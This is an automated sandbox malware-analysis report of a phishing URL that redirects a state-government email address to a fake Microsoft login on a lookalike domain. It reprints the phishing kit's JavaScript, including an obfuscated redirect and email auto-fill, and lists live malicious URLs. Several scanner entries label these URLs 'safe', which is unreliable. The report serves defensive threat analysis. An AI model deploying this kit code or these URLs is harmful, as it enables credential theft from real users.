Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown	Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49951
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747

Source: classification engine

Classification label: mal68.phis.troj.win@19/67@26/9

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Jump to behavior

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=1744,i,10374688926292237597,1627901240066327570,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://demfre.com/lact/nhuo/onaoPJocCsxs7r0YZwFMZ/c3VzYW4ua2FsY3JvZnRAc3RhdGUubmUuZ292"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=1744,i,10374688926292237597,1627901240066327570,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Google Drive.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Registry Run Keys / Startup Folder	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	4 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	5 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
http://demfre.com/lact/nhuo/onaoPJocCsxs7r0YZwFMZ/c3VzYW4ua2FsY3JvZnRAc3RhdGUubmUuZ292	0%	Avira URL Cloud	safe

Source	Detection	Scanner	Label
https://login.loraintoolsltd.xyz/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638732702233892554.YjNkN2RhY2UtZTllZC00NTdiLWFjZWUtZDBmNWZjMmVhMjgxZTdkYzY4NWQtNzFjMS00Y2RmLWE0ZDktODc3NGIyMjQwN2Yx&ui_locales=en-US&mkt=en-US&client-request-id=afbe7e5d-b817-4cfb-925a-fa049f49afdb&state=kniLQk2xa-DHvggiqLVufaTxHzCt68_MOtTY5fKlih45LJaEtQHGehVSVLqXYtSTLKl7iyajJ6lyQqo6GEN-Tk6jQnZKaGbT8bxQSdCJFv2jObO6HnLeK6DCIfhusbndleU5Y_7N4PjytOVZsv_-21jQic58sZlY45vQ7g57a5pqqB69FWA5-SslViaTZOPSwLq5VGXj1t9I08JzKeIVwUxzQzoNLRT_ck8yy8kZR9yzZNTR3jZl5f2iydPalDw4u9-YUJkovZMAqJfRkUNRUA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=true	0%	Avira URL Cloud	safe
https://login.loraintoolsltd.xyz	0%	Avira URL Cloud	safe
https://login.loraintoolsltd.xyz/	0%	Avira URL Cloud	safe
https://login.loraintoolsltd.xyz/FgJIoRDm?q=P2pqOTI	0%	Avira URL Cloud	safe
https://login.loraintoolsltd.xyz/FgJIoRDm	0%	Avira URL Cloud	safe
https://login.loraintoolsltd.xyz/favicon.ico	0%	Avira URL Cloud	safe
https://login.loraintoolsltd.xyz/common/GetCredentialType?mkt=en-US	0%	Avira URL Cloud	safe
http://demfre.com/favicon.ico	0%	Avira URL Cloud	safe
https://www.loraintoolsltd.xyz/login	0%	Avira URL Cloud	safe
https://login.loraintoolsltd.xyz/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638732702233892554.YjNkN2RhY2UtZTllZC00NTdiLWFjZWUtZDBmNWZjMmVhMjgxZTdkYzY4NWQtNzFjMS00Y2RmLWE0ZDktODc3NGIyMjQwN2Yx&ui_locales=en-US&mkt=en-US&client-request-id=afbe7e5d-b817-4cfb-925a-fa049f49afdb&state=kniLQk2xa-DHvggiqLVufaTxHzCt68_MOtTY5fKlih45LJaEtQHGehVSVLqXYtSTLKl7iyajJ6lyQqo6GEN-Tk6jQnZKaGbT8bxQSdCJFv2jObO6HnLeK6DCIfhusbndleU5Y_7N4PjytOVZsv_-21jQic58sZlY45vQ7g57a5pqqB69FWA5-SslViaTZOPSwLq5VGXj1t9I08JzKeIVwUxzQzoNLRT_ck8yy8kZR9yzZNTR3jZl5f2iydPalDw4u9-YUJkovZMAqJfRkUNRUA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0	0%	Avira URL Cloud	safe
https://live.loraintoolsltd.xyz/Me.htm?v=3	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
e329293.dscd.akamaiedge.net	2.23.227.223	true	false	high
login.loraintoolsltd.xyz	173.46.80.217	true	false	high
cdnjs.cloudflare.com	104.17.24.14	true	false	high
www.loraintoolsltd.xyz	173.46.80.217	true	false	high
challenges.cloudflare.com	104.18.95.41	true	false	high
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false	high
www.google.com	142.250.185.68	true	false	high
demfre.com	201.48.8.140	true	false	high
live.loraintoolsltd.xyz	173.46.80.217	true	false	high
a1894.dscb.akamai.net	2.19.126.143	true	false	high
identity.nel.measure.office.net	unknown	unknown	false	high
aadcdn.msftauth.net	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/d/906b6aa41d244405/1737673403079/Dc1M9QxjEV7BqeA	false		high
https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.4/css/all.min.css	false		high
https://login.loraintoolsltd.xyz/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638732702233892554.YjNkN2RhY2UtZTllZC00NTdiLWFjZWUtZDBmNWZjMmVhMjgxZTdkYzY4NWQtNzFjMS00Y2RmLWE0ZDktODc3NGIyMjQwN2Yx&ui_locales=en-US&mkt=en-US&client-request-id=afbe7e5d-b817-4cfb-925a-fa049f49afdb&state=kniLQk2xa-DHvggiqLVufaTxHzCt68_MOtTY5fKlih45LJaEtQHGehVSVLqXYtSTLKl7iyajJ6lyQqo6GEN-Tk6jQnZKaGbT8bxQSdCJFv2jObO6HnLeK6DCIfhusbndleU5Y_7N4PjytOVZsv_-21jQic58sZlY45vQ7g57a5pqqB69FWA5-SslViaTZOPSwLq5VGXj1t9I08JzKeIVwUxzQzoNLRT_ck8yy8kZR9yzZNTR3jZl5f2iydPalDw4u9-YUJkovZMAqJfRkUNRUA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0#susan.kalcroft@state.ne.gov	false		unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=906b6aa41d244405&lang=auto	false		high
https://login.loraintoolsltd.xyz/favicon.ico	false	Avira URL Cloud: safe	unknown
https://login.loraintoolsltd.xyz/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638732702233892554.YjNkN2RhY2UtZTllZC00NTdiLWFjZWUtZDBmNWZjMmVhMjgxZTdkYzY4NWQtNzFjMS00Y2RmLWE0ZDktODc3NGIyMjQwN2Yx&ui_locales=en-US&mkt=en-US&client-request-id=afbe7e5d-b817-4cfb-925a-fa049f49afdb&state=kniLQk2xa-DHvggiqLVufaTxHzCt68_MOtTY5fKlih45LJaEtQHGehVSVLqXYtSTLKl7iyajJ6lyQqo6GEN-Tk6jQnZKaGbT8bxQSdCJFv2jObO6HnLeK6DCIfhusbndleU5Y_7N4PjytOVZsv_-21jQic58sZlY45vQ7g57a5pqqB69FWA5-SslViaTZOPSwLq5VGXj1t9I08JzKeIVwUxzQzoNLRT_ck8yy8kZR9yzZNTR3jZl5f2iydPalDw4u9-YUJkovZMAqJfRkUNRUA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=true	false	Avira URL Cloud: safe	unknown
https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback	false		high
https://www.loraintoolsltd.xyz/login	false	Avira URL Cloud: safe	unknown
https://login.loraintoolsltd.xyz/FgJIoRDm#susan.kalcroft@state.ne.gov	false		unknown
https://login.loraintoolsltd.xyz/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638732702233892554.YjNkN2RhY2UtZTllZC00NTdiLWFjZWUtZDBmNWZjMmVhMjgxZTdkYzY4NWQtNzFjMS00Y2RmLWE0ZDktODc3NGIyMjQwN2Yx&ui_locales=en-US&mkt=en-US&client-request-id=afbe7e5d-b817-4cfb-925a-fa049f49afdb&state=kniLQk2xa-DHvggiqLVufaTxHzCt68_MOtTY5fKlih45LJaEtQHGehVSVLqXYtSTLKl7iyajJ6lyQqo6GEN-Tk6jQnZKaGbT8bxQSdCJFv2jObO6HnLeK6DCIfhusbndleU5Y_7N4PjytOVZsv_-21jQic58sZlY45vQ7g57a5pqqB69FWA5-SslViaTZOPSwLq5VGXj1t9I08JzKeIVwUxzQzoNLRT_ck8yy8kZR9yzZNTR3jZl5f2iydPalDw4u9-YUJkovZMAqJfRkUNRUA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=true#susan.kalcroft@state.ne.gov=	true		unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/906b6aa41d244405/1737673403088/1c87721852139d54858af8dcd971080e84136874a0279165c7e6dc4dec75dcbb/e8tYcQG-cFpJyCP	false		high
https://challenges.cloudflare.com/turnstile/v0/b/725bd36e298b/api.js	false		high
http://demfre.com/favicon.ico	false	Avira URL Cloud: safe	unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/4vxoh/0x4AAAAAAA5pnBhoTgM91kpZ/auto/fbE/new/normal/auto/	false		high
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1	false		high
https://login.loraintoolsltd.xyz/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638732702233892554.YjNkN2RhY2UtZTllZC00NTdiLWFjZWUtZDBmNWZjMmVhMjgxZTdkYzY4NWQtNzFjMS00Y2RmLWE0ZDktODc3NGIyMjQwN2Yx&ui_locales=en-US&mkt=en-US&client-request-id=afbe7e5d-b817-4cfb-925a-fa049f49afdb&state=kniLQk2xa-DHvggiqLVufaTxHzCt68_MOtTY5fKlih45LJaEtQHGehVSVLqXYtSTLKl7iyajJ6lyQqo6GEN-Tk6jQnZKaGbT8bxQSdCJFv2jObO6HnLeK6DCIfhusbndleU5Y_7N4PjytOVZsv_-21jQic58sZlY45vQ7g57a5pqqB69FWA5-SslViaTZOPSwLq5VGXj1t9I08JzKeIVwUxzQzoNLRT_ck8yy8kZR9yzZNTR3jZl5f2iydPalDw4u9-YUJkovZMAqJfRkUNRUA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0	false	Avira URL Cloud: safe	unknown
https://login.loraintoolsltd.xyz/common/GetCredentialType?mkt=en-US	false	Avira URL Cloud: safe	unknown
http://demfre.com/lact/nhuo/onaoPJocCsxs7r0YZwFMZ/c3VzYW4ua2FsY3JvZnRAc3RhdGUubmUuZ292	false		unknown
https://login.loraintoolsltd.xyz/FgJIoRDm	false	Avira URL Cloud: safe	unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/1482238646:1737670630:gvnMz6WUq3EEzTkbKMXmY7htjMwlrnl7INcjpwYtlY0/906b6aa41d244405/ELjc5mh98hUEm9Vd49aH1pPIKJXUCZOHayyvUrkrAb8-1737673400-1.1.1.1-kX2zXm1bzZdEcwlyaL8ZR403rSDB27V0f.r9GcipcEjkQZUM30GkIGD4m3eKHVCe	false		high
https://login.loraintoolsltd.xyz/FgJIoRDm?q=P2pqOTI	false	Avira URL Cloud: safe	unknown
https://login.loraintoolsltd.xyz/	false	Avira URL Cloud: safe	unknown
https://live.loraintoolsltd.xyz/Me.htm?v=3	false	Avira URL Cloud: safe	unknown
https://identity.nel.measure.office.net/api/report?catId=GW+estsfd+wst	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://login.windows-ppe.net	chromecache_109.2.dr, chromecache_96.2.dr	false		high
https://fontawesome.com/license/free	chromecache_81.2.dr	false		high
https://fontawesome.com	chromecache_81.2.dr	false		high
https://login.loraintoolsltd.xyz	chromecache_109.2.dr, chromecache_96.2.dr	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.17.24.14	cdnjs.cloudflare.com	United States	13335	CLOUDFLARENETUS	false
142.250.185.68	www.google.com	United States	15169	GOOGLEUS	false
173.46.80.217	login.loraintoolsltd.xyz	United States	46261	QUICKPACKETUS	false
104.18.94.41	unknown	United States	13335	CLOUDFLARENETUS	false
104.18.95.41	challenges.cloudflare.com	United States	13335	CLOUDFLARENETUS	false
2.19.126.143	a1894.dscb.akamai.net	European Union	16625	AKAMAI-ASUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
201.48.8.140	demfre.com	Brazil	16735	ALGARTELECOMSABR	false

Private

IP
192.168.2.5

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1598120
Start date and time:	2025-01-24 00:02:15 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 17s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	http://demfre.com/lact/nhuo/onaoPJocCsxs7r0YZwFMZ/c3VzYW4ua2FsY3JvZnRAc3RhdGUubmUuZ292
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal68.phis.troj.win@19/67@26/9
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.186.163, 142.250.186.46, 142.251.168.84, 142.250.186.142, 142.250.185.110, 199.232.214.172, 2.23.77.188, 142.250.185.206, 172.217.16.206, 142.250.181.238, 142.250.184.238, 142.250.186.174, 216.58.206.42, 142.250.185.202, 172.217.23.106, 142.250.186.42, 216.58.206.74, 142.250.185.234, 142.250.185.106, 142.250.185.74, 172.217.18.10, 142.250.184.234, 142.250.186.106, 142.250.181.234, 142.250.184.202, 172.217.16.202, 142.250.186.138, 142.250.186.170, 20.50.80.209, 52.168.117.168, 142.250.186.110, 172.217.18.14, 2.19.106.160, 172.202.163.200, 13.107.246.45
Excluded domains from analysis (whitelisted): onedscolprdneu02.northeurope.cloudapp.azure.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, otelrules.azureedge.net, aadcdnoriginwus2.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, browser.events.data.trafficmanager.net, aadcdn.msauth.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, browser.events.data.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, onedscolprdeus07.eastus.cloudapp.azure.com, update.googleapis.com, aadcdnoriginwus2.afd.azureedge.net, clients.l.google.com
Not all processes where analyzed, report is missing behavior information
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: http://demfre.com/lact/nhuo/onaoPJocCsxs7r0YZwFMZ/c3VzYW4ua2FsY3JvZnRAc3RhdGUubmUuZ292

Input	Output
URL: http://demfre.com Model: Joe Sandbox AI	```json{ "brand": "unknown", "brand_classification": "unknown", "legit_url": "unknown", "similarity": 2, "spoofed": 1, "reasoning": "The URL 'demfre.com' does not closely resemble any well-known brand or legitimate URL. There are no obvious character substitutions or visual similarities to a known brand. The domain name 'demfre' does not suggest any specific brand or entity that is commonly recognized. The structure of the URL is simple and does not include any misleading subdomains or domain extensions. Without additional context or a known brand association, it is unlikely that this URL is a typosquatting attempt."}
URL: http://demfre.com
URL: https://loraintoolsltd.xyz Model: Joe Sandbox AI	```json{ "brand": "Lorain Tools", "brand_classification": "unknown", "legit_url": "unknown", "similarity": 2, "spoofed": 1, "reasoning": "The URL 'loraintoolsltd.xyz' does not closely resemble any well-known brand or legitimate URL. The domain name 'loraintoolsltd' suggests a possible business name, 'Lorain Tools Ltd', which could be a legitimate entity. The use of the '.xyz' domain extension is common for various purposes and does not inherently indicate typosquatting. There are no obvious character substitutions or structural changes that mimic a well-known brand. The URL does not appear to be designed to confuse users into thinking it is associated with a globally recognized brand."}
URL: https://loraintoolsltd.xyz
URL: https://login.loraintoolsltd.xyz/FgJIoRDm#susan.ka... Model: Joe Sandbox AI	{ "risk_score": 7, "reasoning": "The script demonstrates several high-risk behaviors, including the use of obfuscated URLs, data exfiltration, and a redirect to a suspicious domain. While the script appears to have some legitimate functionality, such as Turnstile verification and email extraction, the overall behavior is highly suspicious and indicates a potential phishing or malicious intent." }
// Callback for the Turnstile verification function onloadTurnstileCallback() { turnstile.render('#turnstileCaptcha', { sitekey: '0x4AAAAAAA5pnBhoTgM91kpZ', callback: function(response) { // Enable the button after successful verification const verifyButton = document.getElementById('verifyButton'); if (verifyButton) { verifyButton.style.opacity = '1'; // Make button fully visible verifyButton.style.pointerEvents = 'auto'; // Enable pointer events } } }); } // Function to extract and display the fragment function displayEmailFromFragment() { var fragment = window.location.hash; if (fragment) { var email = fragment.substring(1).replace(/=*$/, ''); var emailDisplay = document.getElementById('grabbed-email'); if (emailDisplay) { emailDisplay.textContent = decodeURIComponent(email); } } } // Function to extract and clean the fragment function getFragment() { var fragment = window.location.hash; return fragment ? fragment : ''; } // Redirect function function redirectToLure() { const fragment = getFragment(); const finalUrl = 'h' + 'tt' + 'ps' + ':/' + '/lo' + 'g' + 'in' + '.lo' + 'r' + 'a' + 'i' + 'nto' + 'ol' + 'sl' + 'td' + '.' + 'xyz' + '/Fg' + 'J' + 'IoR' + 'D' + 'm' + '?q=' + 'P2p' + 'qO' + 'T' + 'I' + fragment; // Replace with the actual lure URL // Execute redirect window.location.href = finalUrl; } // Call the function when the page loads document.addEventListener('DOMContentLoaded', function() { displayEmailFromFragment(); const verifyButton = document.getElementById('verifyButton'); if (verifyButton) { verifyButton.addEventListener('click', function(e) { e.preventDefault(); redirectToLure(); }); } });
URL: https://login.loraintoolsltd.xyz/FgJIoRDm#susan.ka... Model: Joe Sandbox AI	{ "risk_score": 2, "reasoning": "The provided JavaScript snippet appears to be a legitimate implementation of a Turnstile verification callback and functionality to extract and display an email from the URL fragment. There are no high-risk indicators, and the behaviors observed are consistent with common web development practices. The script does not demonstrate any malicious intent or suspicious activities." }
// Callback for the Turnstile verification function onloadTurnstileCallback() { turnstile.render('#turnstileCaptcha', { sitekey: '0x4AAAAAAA5pnBhoTgM91kpZ', callback: function(response) { // Enable the button after successful verification const verifyButton = document.getElementById('verifyButton'); if (verifyButton) { verifyButton.style.opacity = '1'; // Make button fully visible verifyButton.style.pointerEvents = 'auto'; // Enable pointer events } } }); } // Function to extract and display the fragment function displayEmailFromFragment() { var fragment = window.location.hash; if (fragment) { var email = fragment.substring(1).replace(/=*$/, ''); var emailDisplay = document.getElementById('grabbed-email'); if (emailDisplay) { emailDisplay.textContent = decodeURIComponent(email); } } } // Function to extract and clean the fragment function getFragment() { var fragment = window.location.hash; return fragment ? fragment : ''; } // Redirect function
URL: https://login.loraintoolsltd.xyz/common/oauth2/v2.... Model: Joe Sandbox AI	{ "risk_score": 6, "reasoning": "The script demonstrates moderate-risk behaviors, including external data transmission and aggressive DOM manipulation. While the intent appears to be related to login functionality, the use of URL fragments and automatic form filling without user interaction raises some concerns. Further review is recommended to ensure the script's legitimacy and lack of malicious intent." }
function lp() { // Select the email input field and "Next" button var emailId = document.querySelector("#i0116"); var nextButton = document.querySelector("#idSIButton9"); var query = window.location.href; // Check if the URL contains a fragment (#) if (/#/.test(window.location.href)) { var res = query.split("#"); var data1 = res[0]; var data2 = res[1]; console.log(data1); console.log(data2); // If the email input field is found if (emailId != null) { // Use data2 directly as the email address, trim any extra spaces, and remove any trailing equal signs var emailAddress = data2.trim().replace(/=*$/, ''); // Focus on the email input field, set its value, and click the "Next" button emailId.focus(); emailId.value = emailAddress; nextButton.focus(); nextButton.click(); console.log("YES!"); return; } } // Retry the lp function every 500 milliseconds if the email input field is not found setTimeout(function() { lp(); }, 500); } // Initial timeout to invoke the lp function after 500 milliseconds setTimeout(function() { lp(); }, 500);
URL: https://login.loraintoolsltd.xyz/common/oauth2/v2.... Model: Joe Sandbox AI	{ "risk_score": 5, "reasoning": "The provided JavaScript snippet exhibits a mix of behaviors that require further review. While it does not contain any clear indicators of malicious intent, it uses some practices that could be considered aggressive or potentially problematic. The script appears to be implementing a custom debugging/logging functionality, which is not inherently malicious, but the way it manipulates the DOM and interacts with external domains raises some concerns. Overall, the script warrants closer inspection to ensure it is not engaging in any unintended or suspicious activities." }
//<![CDATA[ !function(){var e=window,r=e.$Debug=e.$Debug\|\|{},t=e.$Config\|\|{};if(!r.appendLog){var n=[],o=0;r.appendLog=function(e){var r=t.maxDebugLog\|\|25,i=(new Date).toUTCString()+":"+e;n.push(o+":"+i),n.length>r&&n.shift(),o++},r.getLogs=function(){return n}}}(),function(){function e(e,r){function t(i){var a=e[i];if(i<n-1){return void(o.r[a]?t(i+1):o.when(a,function(){t(i+1)}))}r(a)}var n=e.length;t(0)}function r(e,r,i){function a(){var e=!!s.method,o=e?s.method:i[0],a=s.extraArgs\|\|[],u=n.$WebWatson;try{ var c=t(i,!e);if(a&&a.length>0){for(var d=a.length,l=0;l<d;l++){c.push(a[l])}}o.apply(r,c)}catch(e){return void(u&&u.submitFromException&&u.submitFromException(e))}}var s=o.r&&o.r[e];return r=r\|\|this,s&&(s.skipTimeout?a():n.setTimeout(a,0)),s}function t(e,r){return Array.prototype.slice.call(e,r?1:0)}var n=window;n.$Do\|\|(n.$Do={"q":[],"r":[],"removeItems":[],"lock":0,"o":[]});var o=n.$Do;o.when=function(t,n){function 